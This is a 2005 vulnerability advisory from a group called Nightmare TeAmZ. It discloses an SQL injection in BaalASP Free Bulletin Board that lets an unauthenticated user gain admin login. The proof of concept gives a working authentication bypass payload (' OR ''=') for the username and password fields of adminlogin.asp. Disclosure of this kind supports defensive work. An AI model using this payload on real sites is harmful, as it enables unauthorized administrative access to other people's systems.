------------------------------------------------------ Nightmare TeAmZ Advisory 002 ------------------------------------------------------ Date - 10/2005 BaalASP Free Bulletin Board Sql Injection Admin Login AFFECTED PRODUCTS ================= BaalASP Free Bulletin Board http://baalasp.com/index.shtml OVERVIEW ======== BaalASP is a simple easy to install discussion form ( bulletin board) which supports ether an access backend, or MySQL. Installation is easy, and only takes a few moments with no programming knowledge required. Supports users, publishers and administrators DETAILS ======= 1. Sql Injection An unauthenticated attacker may login admin in the vulnerable site POC === 1. ------ Sql Injecion: Exemple -------- WWW.[Host]/[BaalASP]/adminlogin.asp User:' OR ''=' Pass:' OR ''=' SOLUTION: ========= 1.Vendor contacted 2.Venditor Ignored The Mail.. 3.Exploit Relased Credits ======= This vulnerability was discovered and researched by BiPi_HaCk of Nightmare TeAmZ Site: http://www.NightmareTeAmZ.altervista.org _________________________________________________________________ Blocca le pop-up pubblicitarie con MSN Toolbar! http://toolbar.msn.it/